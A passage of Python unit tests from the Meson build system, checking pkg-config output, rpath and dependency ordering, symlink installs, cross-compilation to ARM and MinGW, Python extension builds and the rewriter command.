def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_secondary_dependencies(self):
'''
Check that Meson gets -Wl,-rpath-link right for secondary dependencies
This test requires at least two libraries, as -Wl,-rpath-link is only
required for dependencies of dependencies (i.e. secondary dependencies).
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 rpath-link secondary')
# build libA
testdirlibA = os.path.join(testdirbase, 'libA')
testlibAprefix = os.path.join(tempdirname, 'libAprefix')
self.init(testdirlibA, extra_args=['--prefix=' + testlibAprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False)
self.build()
self.install(use_destdir=False)
# build libB (uses libA)
pkg_dir = [os.path.join(testlibAprefix, 'lib/pkgconfig')]
self.new_builddir()
testdirlibB = os.path.join(testdirbase, 'libB')
testlibBprefix = os.path.join(tempdirname, 'libBprefix')
self.init(testdirlibB, extra_args=['--prefix=' + testlibBprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False,
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
self.install(use_destdir=False)
# build executable (uses libB, secondary dependency on libA)
pkg_dir.append(os.path.join(testlibBprefix, 'lib/pkgconfig'))
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '68 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
os.chdir(subdir)
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
os.chdir(curdir)
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '69 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '69 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
